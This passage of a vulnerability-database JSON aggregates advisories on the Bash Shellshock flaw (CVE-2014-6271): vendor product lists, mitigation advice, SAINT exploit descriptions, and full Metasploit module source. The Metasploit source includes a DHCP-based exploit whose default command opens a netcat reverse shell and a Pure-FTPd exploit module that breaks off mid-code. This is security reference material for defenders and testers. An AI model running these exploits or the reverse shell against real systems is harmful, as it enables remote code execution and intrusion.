\n * Redhat Enterprise Linux HPC Node 6 \n * Redhat Enterprise Linux HPC Node 7 \n * Redhat Enterprise Linux Long Life 5.6 server \n * Redhat Enterprise Linux Long Life 5.9.server \n * Redhat Enterprise Linux Server 6 \n * Redhat Enterprise Linux Server 7 \n * Redhat Enterprise Linux Server AUS 6.2 \n * Redhat Enterprise Linux Server AUS 6.4 \n * Redhat Enterprise Linux Server AUS 6.5 \n * Redhat Enterprise Linux Server EUS 6.4.z \n * Redhat Enterprise Linux Server EUS 6.5.z \n * Redhat Enterprise Linux Workstation 6 \n * Redhat Enterprise Linux Workstation 7 \n * Riverbed Technology Granite CORE \n * Riverbed Technology Interceptor \n * Riverbed Technology SteelCentral NetShark \n * Riverbed Technology SteelCentral Profiler \n * Riverbed Technology SteelCentral Services Controller \n * Riverbed Technology SteelHead EX \n * Riverbed Technology Steelhead \n * Slackware Slackware Linux 13.0 \n * Slackware Slackware Linux 13.1 \n * Slackware Slackware Linux 13.1 \n * Slackware Slackware Linux 13.37 \n * Slackware Slackware Linux 14.0 \n * Slackware Slackware Linux 14.1 \n * SuSE Linux Enterprise Desktop 12 \n * SuSE Linux Enterprise Server 12 \n * SuSE Linux Enterprise Software Development Kit 12 \n * SuSE Manager (for SLE 11 SP2) 1.7 \n * SuSE SUSE Linux Enterprise Server 10 SP4 LTSS \n * SuSE SUSE Linux Enterprise Server 11 SP1 LTSS \n * SuSE SUSE Linux Enterprise Server 11 SP2 LTSS \n * SuSE SUSE Linux Enterprise Server 11 SP3 \n * SuSE SUSE Linux Enterprise Server 11 SP3 for VMware \n * SuSE SUSE Linux Enterprise Server for VMware 11 SP3 \n * SuSE SUSE Linux Enterprise Software Development Kit 11 SP3 \n * SuSE Suse Linux Enterprise Desktop 11 SP3 \n * SuSE openSUSE 12.3 \n * SuSE openSUSE 13.1 \n * SuSE openSUSE 13.2 \n * SuSE openSUSE Evergreen 11.4 \n * Symantec NetBackup Appliances 5000 1.4.4 \n * Symantec NetBackup Appliances 5030 1.4.4 \n * Symantec NetBackup Appliances 5200 1.1 \n * Symantec NetBackup Appliances 5200 2.0 \n * Symantec NetBackup Appliances 5220 2.0 \n * Symantec NetBackup Appliances 5230 2.5.2 \n * Symantec NetBackup Appliances 5230 2.5.3 \n * Symantec NetBackup Appliances 5230 2.5.4 \n * Symantec NetBackup Appliances 5230 2.6 \n * Symantec NetBackup Enterprise Server 7.0 \n * Symantec NetBackup Server 7.0 \n * Trendmicro Advanced Reporting Module (ARM) 1.5 \n * Trendmicro Advanced Reporting Module (ARM) 1.6 \n * Trendmicro Data Loss Prevention Network Monitor (DLPNM) 2.0 \n * Trendmicro Interscan Messaging Security Virtual Appliance (IMSVA) 8.0 \n * Trendmicro Interscan Messaging Security Virtual Appliance (IMSVA) 8.2 \n * Trendmicro Interscan Messaging Security Virtual Appliance (IMSVA) 8.5 \n * Trendmicro Interscan Web Security Virtual Appliance (IWSVA) 5.5 \n * Trendmicro Interscan Web Security Virtual Appliance (IWSVA) 5.6 \n * Trendmicro Interscan Web Security Virtual Appliance (IWSVA) 6.0 SP1 \n * Trendmicro Interscan Web Security Virtual Appliance (IWSVA) 6.5 \n * Ubuntu Ubuntu Linux 10.04 ARM \n * Ubuntu Ubuntu Linux 10.04 Amd64 \n * Ubuntu Ubuntu Linux 10.04 I386 \n * Ubuntu Ubuntu Linux 10.04 Powerpc \n * Ubuntu Ubuntu Linux 10.04 Sparc \n * Ubuntu Ubuntu Linux 12.04 LTS amd64 \n * Ubuntu Ubuntu Linux 12.04 LTS i386 \n * Ubuntu Ubuntu Linux 14.04 LTS \n * VMWare Application Dependency Planner \n * VMWare ESX 4.0 \n * VMWare ESX 4.1 \n * VMWare ESXi \n * VMWare HealthAnalyzer 5.0 \n * VMWare Horizon DaaS Platform 5.0 \n * VMWare Horizon Workspace 1.5 \n * VMWare Horizon Workspace 1.8 \n * VMWare Horizon Workspace 1.8.1 \n * VMWare Horizon Workspace 2.0 \n * VMWare IT Business Management Suite 1.0 \n * VMWare Mirage Gateway 5.0 \n * VMWare NSX for Multi-Hypervisor 4.0.3 \n * VMWare NSX for Multi-Hypervisor 4.1.2 \n * VMWare NSX for vSphere 6.0.4 \n * VMWare NVP 3.0 \n * VMWare NVP 3.2.2 \n * VMWare Socialcast On Premise \n * VMWare Studio 2.0 \n * VMWare Studio 2.0 BETA \n * VMWare Studio 2.1 \n * VMWare TAM Data Manager \n * VMWare VMware Data Recovery 2.0.3 \n * VMWare Vcenter Converter Standalone 5.1 \n * VMWare Vcenter Converter Standalone 5.5 \n * VMWare Viewplanner 3.0 \n * VMWare Workbench 3.0 \n * VMWare vCenter Application Discovery Manager \n * VMWare vCenter Hyperic Server 5.0 \n * VMWare vCenter Infrastructure Navigator 5.0 \n * VMWare vCenter Infrastructure Navigator 5.8 \n * VMWare vCenter Log Insight 1.0 \n * VMWare vCenter Log Insight 2.0 \n * VMWare vCenter Operations Manager 5.8.1 \n * VMWare vCenter Orchestrator Appliance 4.0 \n * VMWare vCenter Orchestrator Appliance 5.0 \n * VMWare vCenter Server Appliance 5.0 \n * VMWare vCenter Server Appliance 5.0 Update 1 \n * VMWare vCenter Server Appliance 5.0 Update 2 \n * VMWare vCenter Server Appliance 5.1 \n * VMWare vCenter Server Appliance 5.1 Patch 1 \n * VMWare vCenter Server Appliance 5.1 Update 1 \n * VMWare vCenter Server Appliance 5.1.0 Update b \n * VMWare vCenter Server Appliance 5.5 \n * VMWare vCenter Server Appliance 5.5 Update 1 \n * VMWare vCenter Site Recovery Manager 5.1.1 \n * VMWare vCenter Site Recovery Manager 5.5.1 \n * VMWare vCenter Support Assistant 5.5.0 \n * VMWare vCenter Support Assistant 5.5.1 \n * VMWare vCloud Automation Center (vCAC) 6.0 \n * VMWare vCloud Automation Center Application Services 6.0 \n * VMWare vCloud Connector 2.0 \n * VMWare vCloud Director Appliance 5.0 \n * VMWare vCloud Networking and Security 5.1 \n * VMWare vCloud Networking and Security 5.1.2 \n * VMWare vCloud Networking and Security 5.1.3 \n * VMWare vCloud Networking and Security 5.1.4.2 \n * VMWare vCloud Networking and Security 5.5 \n * VMWare vCloud Networking and Security 5.5.1 \n * VMWare vCloud Networking and Security 5.5.2 \n * VMWare vCloud Networking and Security 5.5.3 \n * VMWare vCloud Usage Meter 3.0 \n * VMWare vFabric Application Director 5.0.0 \n * VMWare vFabric Application Director 5.2.0 \n * VMWare vFabric Application Director 6.0 \n * VMWare vFabric Postgres 9.1.6 \n * VMWare vFabric Postgres 9.1.9 \n * VMWare vFabric Postgres 9.2.2 \n * VMWare vFabric Postgres 9.2.4 \n * VMWare vSphere App HA 1.0 \n * VMWare vSphere Big Data Extensions 1.0 \n * VMWare vSphere Big Data Extensions 2.0 \n * VMWare vSphere Data Protection 5.0 \n * VMWare vSphere Management Assistant 5.0 \n * VMWare vSphere Replication 5.5.1 \n * VMWare vSphere Replication 5.6 \n * VMWare vSphere Storage Appliance 5.1.3 \n * VMWare vSphere Storage Appliance 5.5.1 \n * Xerox ColorQube 8700 \n * Xerox ColorQube 8900 \n * Xerox ColorQube 9301 \n * Xerox ColorQube 9302 \n * Xerox ColorQube 9303 \n * Xerox ColorQube 9393 \n * Xerox Phaser 6700 \n * Xerox Phaser 7800 \n * Xerox WorkCentre 3655 \n * Xerox WorkCentre 5735 \n * Xerox WorkCentre 5740 \n * Xerox WorkCentre 5745 \n * Xerox WorkCentre 5755 \n * Xerox WorkCentre 5945 \n * Xerox WorkCentre 5955 \n * Xerox WorkCentre 6655 \n * Xerox WorkCentre 7220 \n * Xerox WorkCentre 7225 \n * Xerox WorkCentre 7228 \n * Xerox WorkCentre 7232 \n * Xerox WorkCentre 7235 \n * Xerox WorkCentre 7238 \n * Xerox WorkCentre 7242 \n * Xerox WorkCentre 7245 \n * Xerox WorkCentre 7525 \n * Xerox WorkCentre 7530 \n * Xerox WorkCentre 7535 \n * Xerox WorkCentre 7545 \n * Xerox WorkCentre 7556 \n * Xerox WorkCentre 7755 \n * Xerox WorkCentre 7765 \n * Xerox WorkCentre 7775 \n * Xerox WorkCentre 7830 \n * Xerox WorkCentre 7835 \n * Xerox WorkCentre 7845 \n * Xerox WorkCentre 7855 \n * Xerox WorkCentre 7970 \n\n### Recommendations\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic \n\n**Implement multiple redundant layers of security.** \nVarious memory-protection schemes (such as nonexecutable and randomly mapped memory segments) may hinder an attacker's ability to exploit this vulnerability to execute arbitrary code.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo limit the impact of latent vulnerabilities, configure database servers and other applications to run as a nonadministrative user with minimal access rights.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2014-09-24T00:00:00", "published": "2014-09-24T00:00:00", "id": "SMNTC-70103", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/70103", "type": "symantec", "title": "GNU Bash CVE-2014-6271 Remote Code Execution Vulnerability", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "paloalto": [{"lastseen": "2018-08-31T00:11:40", "bulletinFamily": "software", "description": "Palo Alto Networks has become aware of a remote code execution vulnerability in the Bash shell utility. This vulnerability (CVE-2014-6271) allows for remote code execution through multiple vectors due to the way Bash is often used on linux systems for processing commands. Additional information can be found here: http://seclists.org/oss-sec/2014/q3/650 \n", "modified": "2014-09-25T00:00:00", "published": "2014-09-24T00:00:00", "id": "PAN-SA-2014-0004", "href": "https://securityadvisories.paloaltonetworks.com/Home/Detail/24", "title": "Bash Shell remote code execution (CVE-2014-6271, CVE-2014-7169)", "type": "paloalto", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "saint": [{"lastseen": "2018-08-31T00:08:19", "bulletinFamily": "exploit", "description": "Added: 11/20/2014 \nCVE: [CVE-2014-6271](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271>) \nBID: [70103](<http://www.securityfocus.com/bid/70103>) \nOSVDB: [112004](<http://www.osvdb.org/112004>) \n\n\n### Background\n\nBash is vulnerable to command injection using environment variables. When an application takes user input and uses setenv() a malicious actor is able to execute commands on the target in the security context of the running application. This exploit implements a DHCP server that listens for DHCP Request packets. DHCP Response packets are sent with a payload that will generate a shell script in /tmp/s.sh and execute it. By default the shell script executes a netcat call back shell on the specified port. The payload of the exploit can be modified by changing exploits/s.sh \n\n### Limitations\n\nSuccessful exploitation over DHCP is a race against the real DHCP server on the network. On some affected systems the payload will execute even when the race is lost however the reliability of the exploit will vary. Due to network latency reliability attacking from wireless networks is reduced. It is possible that networking will have to be restarted manually on the client in some cases. \n\n### Resolution\n\nInstall the appropriate bash patch for your system. \n\n", "modified": "2014-11-20T00:00:00", "published": "2014-11-20T00:00:00", "id": "SAINT:E7D41DAA0FE2CCB57388A4812EEC9C00", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/ssdhcp", "title": "ShellShock DHCP Server", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:08:12", "bulletinFamily": "exploit", "description": "Added: 09/26/2014 \nCVE: [CVE-2014-6271](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271>) \nBID: [70103](<http://www.securityfocus.com/bid/70103>) \nOSVDB: [112004](<http://www.osvdb.org/112004>) \n\n\n### Background\n\n[GNU Bash](<http://www.gnu.org/software/bash/>) (Bourne Again SHell) is a command shell commonly used on Linux and Unix systems. \n\n### Problem\n\nThe Bash shell executes commands injected after function definitions contained in environment variables. This could be used by a remote attacker to cause arbitrary commands to execute if a web server hosts programs which invoke the Bash shell. \n\n### Resolution\n\nApply updated Bash packages from the Linux or Unix vendor. \n\n### References\n\n<https://www.us-cert.gov/ncas/alerts/TA14-268A> \n\n\n### Limitations\n\nThis exploit requires the path to a web program which invokes the Bash shell. This attack vector may not exist on all systems with affected versions of Bash, and other attack vectors may exist which are not covered by this exploit. \n\n", "modified": "2014-09-26T00:00:00", "published": "2014-09-26T00:00:00", "id": "SAINT:A192C3991EB7069FAA4A6A96BA76C435", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/bash_shellshock_http", "title": "Bash environment variable code injection over HTTP", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-14T16:58:04", "bulletinFamily": "exploit", "description": "Added: 11/05/2014 \nCVE: [CVE-2014-6271](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271>) \nBID: [70103](<http://www.securityfocus.com/bid/70103>) \nOSVDB: [112004](<http://www.osvdb.org/112004>) \n\n\n### Background\n\n[GNU Bash](<http://www.gnu.org/software/bash/>) (Bourne Again SHell) is a command shell commonly used on Linux and Unix systems. \n\nCUPS is printing software for UNIX-like systems that allows a computer to act as a print server. \n\n### Problem\n\nThe Bash shell executes commands injected after function definitions contained in environment variables. This could be used by a remote attacker to cause arbitrary commands to execute when a CUPS server invokes the Bash shell. \n\n### Resolution\n\nApply updated Bash packages from the Linux or Unix vendor. \n\n### References\n\n<https://www.us-cert.gov/ncas/alerts/TA14-268A> \n\n\n### Limitations\n\nThis exploit requires the user name and password for the CUPS server. This attack vector may not exist on all systems with affected versions of Bash, and other attack vectors may exist which are not covered by this exploit. \n\n", "modified": "2014-11-05T00:00:00", "published": "2014-11-05T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/bash_shellshock_cups", "id": "SAINT:115143B4FAD70F6ECA6FF95A951FEA51", "title": "Bash Environment Variable Handling Shell Command Injection Via CUPS", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-10-03T15:01:56", "bulletinFamily": "exploit", "description": "Added: 11/20/2014 \nCVE: [CVE-2014-6271](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271>) \nBID: [70103](<http://www.securityfocus.com/bid/70103>) \nOSVDB: [112004](<http://www.osvdb.org/112004>) \n\n\n### Background\n\nBash is vulnerable to command injection using environment variables. When an application takes user input and uses setenv() a malicious actor is able to execute commands on the target in the security context of the running application. This exploit implements a DHCP server that listens for DHCP Request packets. DHCP Response packets are sent with a payload that will generate a shell script in /tmp/s.sh and execute it. By default the shell script executes a netcat call back shell on the specified port. The payload of the exploit can be modified by changing exploits/s.sh \n\n### Limitations\n\nSuccessful exploitation over DHCP is a race against the real DHCP server on the network. On some affected systems the payload will execute even when the race is lost however the reliability of the exploit will vary. Due to network latency reliability attacking from wireless networks is reduced. It is possible that networking will have to be restarted manually on the client in some cases. \n\n### Resolution\n\nInstall the appropriate bash patch for your system. \n\n", "modified": "2014-11-20T00:00:00", "published": "2014-11-20T00:00:00", "id": "SAINT:2AE124BF9DEB7BF62DF04248DEE949D2", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/ssdhcp", "type": "saint", "title": "ShellShock DHCP Server", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-14T16:58:07", "bulletinFamily": "exploit", "description": "Added: 11/20/2014 \nCVE: [CVE-2014-6271](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271>) \nBID: [70103](<http://www.securityfocus.com/bid/70103>) \nOSVDB: [112004](<http://www.osvdb.org/112004>) \n\n\n### Background\n\nBash is vulnerable to command injection using environment variables. When an application takes user input and uses setenv() a malicious actor is able to execute commands on the target in the security context of the running application. This exploit implements a DHCP server that listens for DHCP Request packets. DHCP Response packets are sent with a payload that will generate a shell script in /tmp/s.sh and execute it. By default the shell script executes a netcat call back shell on the specified port. The payload of the exploit can be modified by changing exploits/s.sh \n\n### Limitations\n\nSuccessful exploitation over DHCP is a race against the real DHCP server on the network. On some affected systems the payload will execute even when the race is lost however the reliability of the exploit will vary. Due to network latency reliability attacking from wireless networks is reduced. It is possible that networking will have to be restarted manually on the client in some cases. \n\n### Resolution\n\nInstall the appropriate bash patch for your system. \n\n", "modified": "2014-11-20T00:00:00", "published": "2014-11-20T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/ssdhcp", "id": "SAINT:7C12BAFAA5D8DBBC0D183D44EB230ABB", "type": "saint", "title": "ShellShock DHCP Server", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:08:11", "bulletinFamily": "exploit", "description": "Added: 11/05/2014 \nCVE: [CVE-2014-6271](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271>) \nBID: [70103](<http://www.securityfocus.com/bid/70103>) \nOSVDB: [112004](<http://www.osvdb.org/112004>) \n\n\n### Background\n\n[GNU Bash](<http://www.gnu.org/software/bash/>) (Bourne Again SHell) is a command shell commonly used on Linux and Unix systems. \n\nCUPS is printing software for UNIX-like systems that allows a computer to act as a print server. \n\n### Problem\n\nThe Bash shell executes commands injected after function definitions contained in environment variables. This could be used by a remote attacker to cause arbitrary commands to execute when a CUPS server invokes the Bash shell. \n\n### Resolution\n\nApply updated Bash packages from the Linux or Unix vendor. \n\n### References\n\n<https://www.us-cert.gov/ncas/alerts/TA14-268A> \n\n\n### Limitations\n\nThis exploit requires the user name and password for the CUPS server. This attack vector may not exist on all systems with affected versions of Bash, and other attack vectors may exist which are not covered by this exploit. \n\n", "modified": "2014-11-05T00:00:00", "published": "2014-11-05T00:00:00", "id": "SAINT:2E3ECAFB8AE7339B98B8B66F6B3CB6B6", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/bash_shellshock_cups", "title": "Bash Environment Variable Handling Shell Command Injection Via CUPS", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-14T16:58:05", "bulletinFamily": "exploit", "description": "Added: 09/26/2014 \nCVE: [CVE-2014-6271](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271>) \nBID: [70103](<http://www.securityfocus.com/bid/70103>) \nOSVDB: [112004](<http://www.osvdb.org/112004>) \n\n\n### Background\n\n[GNU Bash](<http://www.gnu.org/software/bash/>) (Bourne Again SHell) is a command shell commonly used on Linux and Unix systems. \n\n### Problem\n\nThe Bash shell executes commands injected after function definitions contained in environment variables. This could be used by a remote attacker to cause arbitrary commands to execute if a web server hosts programs which invoke the Bash shell. \n\n### Resolution\n\nApply updated Bash packages from the Linux or Unix vendor. \n\n### References\n\n<https://www.us-cert.gov/ncas/alerts/TA14-268A> \n\n\n### Limitations\n\nThis exploit requires the path to a web program which invokes the Bash shell. This attack vector may not exist on all systems with affected versions of Bash, and other attack vectors may exist which are not covered by this exploit. \n\n", "modified": "2014-09-26T00:00:00", "published": "2014-09-26T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/bash_shellshock_http", "id": "SAINT:5C86AB1074A96B306662C51ADE6F4B61", "type": "saint", "title": "Bash environment variable code injection over HTTP", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-10-03T15:01:54", "bulletinFamily": "exploit", "description": "Added: 11/05/2014 \nCVE: [CVE-2014-6271](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271>) \nBID: [70103](<http://www.securityfocus.com/bid/70103>) \nOSVDB: [112004](<http://www.osvdb.org/112004>) \n\n\n### Background\n\n[GNU Bash](<http://www.gnu.org/software/bash/>) (Bourne Again SHell) is a command shell commonly used on Linux and Unix systems. \n\nCUPS is printing software for UNIX-like systems that allows a computer to act as a print server. \n\n### Problem\n\nThe Bash shell executes commands injected after function definitions contained in environment variables. This could be used by a remote attacker to cause arbitrary commands to execute when a CUPS server invokes the Bash shell. \n\n### Resolution\n\nApply updated Bash packages from the Linux or Unix vendor. \n\n### References\n\n<https://www.us-cert.gov/ncas/alerts/TA14-268A> \n\n\n### Limitations\n\nThis exploit requires the user name and password for the CUPS server. This attack vector may not exist on all systems with affected versions of Bash, and other attack vectors may exist which are not covered by this exploit. \n\n", "modified": "2014-11-05T00:00:00", "published": "2014-11-05T00:00:00", "id": "SAINT:5BBB36CD07D0D401F363CA3F726533A5", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/bash_shellshock_cups", "type": "saint", "title": "Bash Environment Variable Handling Shell Command Injection Via CUPS", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-10-03T15:02:00", "bulletinFamily": "exploit", "description": "Added: 09/26/2014 \nCVE: [CVE-2014-6271](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271>) \nBID: [70103](<http://www.securityfocus.com/bid/70103>) \nOSVDB: [112004](<http://www.osvdb.org/112004>) \n\n\n### Background\n\n[GNU Bash](<http://www.gnu.org/software/bash/>) (Bourne Again SHell) is a command shell commonly used on Linux and Unix systems. \n\n### Problem\n\nThe Bash shell executes commands injected after function definitions contained in environment variables. This could be used by a remote attacker to cause arbitrary commands to execute if a web server hosts programs which invoke the Bash shell. \n\n### Resolution\n\nApply updated Bash packages from the Linux or Unix vendor. \n\n### References\n\n<https://www.us-cert.gov/ncas/alerts/TA14-268A> \n\n\n### Limitations\n\nThis exploit requires the path to a web program which invokes the Bash shell. This attack vector may not exist on all systems with affected versions of Bash, and other attack vectors may exist which are not covered by this exploit. \n\n", "modified": "2014-09-26T00:00:00", "published": "2014-09-26T00:00:00", "id": "SAINT:EA7480D87E33A13B3179AF9B56E84AFC", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/bash_shellshock_http", "type": "saint", "title": "Bash environment variable code injection over HTTP", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2018-08-31T00:08:38", "bulletinFamily": "unix", "description": "Stephane Chazelas discovered that Bash incorrectly handled trailing code in function definitions. An attacker could use this issue to bypass environment restrictions, such as SSH forced command environments.", "modified": "2014-09-24T00:00:00", "published": "2014-09-24T00:00:00", "id": "USN-2362-1", "href": "https://usn.ubuntu.com/2362-1/", "title": "Bash vulnerability", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2019-02-12T10:43:47", "bulletinFamily": "exploit", "description": "This module exploits the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This module targets dhclient by responding to DHCP requests with a malicious hostname, domainname, and URL which are then passed to the configuration scripts as environment variables, resulting in code execution.", "modified": "2018-09-18T03:29:20", "published": "2014-09-26T04:37:00", "id": "MSF:AUXILIARY/SERVER/DHCLIENT_BASH_ENV", "href": "", "type": "metasploit", "title": "DHCP Client Bash Environment Variable Code Injection (Shellshock)", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/dhcp'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::DHCPServer\n\n def initialize\n super(\n 'Name' => 'DHCP Client Bash Environment Variable Code Injection (Shellshock)',\n 'Description' => %q{\n This module exploits the Shellshock vulnerability, a flaw in how the Bash shell\n handles external environment variables. This module targets dhclient by responding\n to DHCP requests with a malicious hostname, domainname, and URL which are then\n passed to the configuration scripts as environment variables, resulting in code\n execution.\n },\n 'Author' =>\n [\n 'scriptjunkie', 'apconole[at]yahoo.com', # Original DHCP Server auxiliary module\n 'Stephane Chazelas', # Vulnerability discovery\n 'Ramon de C Valle' # This module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service',\n 'References' => [\n [ 'CVE', '2014-6271' ],\n [ 'CWE', '94' ],\n [ 'OSVDB', '112004' ],\n [ 'EDB', '34765' ],\n [ 'URL', 'https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/' ],\n [ 'URL', 'https://seclists.org/oss-sec/2014/q3/649' ],\n [ 'URL', 'https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/' ]\n ],\n 'DisclosureDate' => 'Sep 24 2014',\n 'Notes' =>\n {\n 'AKA' => ['Shellshock']\n }\n )\n\n register_options(\n [\n OptString.new('CMD', [ true, 'The command to run', '/bin/nc -e /bin/sh 127.0.0.1 4444'])\n ])\n\n deregister_options('DOMAINNAME', 'HOSTNAME', 'URL')\n end\n\n def run\n value = \"() { :; }; PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin #{datastore['CMD']}\"\n\n hash = datastore.copy\n hash['DOMAINNAME'] = value\n hash['HOSTNAME'] = value\n hash['URL'] = value\n\n # This loop is required because the current DHCP Server exits after the\n # first interaction.\n loop do\n begin\n start_service(hash)\n\n while @dhcp.thread.alive?\n select(nil, nil, nil, 2)\n end\n\n rescue Interrupt\n break\n\n ensure\n stop_service\n end\n end\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/dhclient_bash_env.rb"}, {"lastseen": "2019-02-12T10:43:48", "bulletinFamily": "exploit", "description": "This module exploits the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This module targets the Pure-FTPd FTP server when it has been compiled with the --with-extauth flag and an external Bash script is used for authentication. If the server is not set up this way, the exploit will fail, even if the version of Bash in use is vulnerable.", "modified": "2018-10-28T00:54:14", "published": "2014-10-01T18:57:40", "id": "MSF:EXPLOIT/MULTI/FTP/PUREFTPD_BASH_ENV_EXEC", "href": "", "type": "metasploit", "title": "Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Ftp\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)',\n 'Description' => %q(\n This module exploits the Shellshock vulnerability, a flaw in how the Bash shell\n handles external environment variables. This module targets the Pure-FTPd FTP\n server when it has been compiled with the --with-extauth flag and an external\n Bash script is used for authentication. If the server is not set up this way,\n the exploit will fail, even if the version of Bash in use is vulnerable.\n ),\n 'Author' =>\n [\n 'Stephane Chazelas', # Vulnerability discovery\n 'Frank Denis', # Discovery of Pure-FTPd attack vector\n 'Spencer McIntyre' # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2014-6271' ],\n [ 'CWE', '94' ],\n [ 'OSVDB', '112004' ],\n [ 'EDB', '34765' ],\n [ 'URL', 'https://gist.github.com/jedisct1/88c62ee34e6fa92c31dc' ],\n [ 'URL', 'http://download.pureftpd.org/pub/pure-ftpd/doc/README.Authentication-Modules' ]\n ],\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Space' => 2048\n },\n 'Targets' =>\n [\n [ 'Linux x86',\n {\n 'Platform' => 'linux',\n 'Arch' => ARCH_X86,\n 'CmdStagerFlavor' => :printf\n }\n ],\n [ 'Linux x86_64',\n {\n 'Platform' => 'linux',\n 'Arch' => ARCH_X64,\n 'CmdStagerFlavor' => :printf\n }\n ]\n ],\n 'DefaultOptions' =>\n {\n 'PrependFork' => true\n },\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Sep 24 2014',\n 'Notes' =>\n {\n 'AKA' => [ 'Shellshock' ],\n 'Stability' => [ CRASH_SAFE, ],\n 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ],\n 'Reliability' => [ REPEATABLE_SESSION, ],\n },\n ))\n register_options(\n [\n Opt::RPORT(21),\n OptString.new('RPATH', [true, 'Target PATH for binaries used by the CmdStager', '/bin'])\n ])\n deregister_options('FTPUSER', 'FTPPASS')\n end\n\n def check\n # this check method tries to use the vulnerability to bypass the login\n username = rand_text_alphanumeric(rand(20) + 1)\n random_id = (rand(100) + 1)\n command = \"echo auth_ok:1; echo uid:#{random_id}; echo gid:#{random_id}; echo dir:/tmp; echo end\"\n if send_command(username, command) =~ /^2\\d\\d ok./i\n disconnect\n return CheckCode::Safe if banner !~ /pure-ftpd/i\n\n command = \"echo auth_ok:0; echo end\"\n if send_command(username, command) =~ /^5\\d\\d login authentication failed/i\n disconnect\n return CheckCode::Vulnerable\n end\n end\n disconnect\n\n CheckCode::Safe\n end\n\n def execute_command(cmd, _opts)\n cmd.gsub!('chmod', \"#{datastore['RPATH']}/chmod\")\n username = rand_text_alphanumeric(rand(20) + 1)\n send_command(username, cmd)\n end\n\n def exploit\n 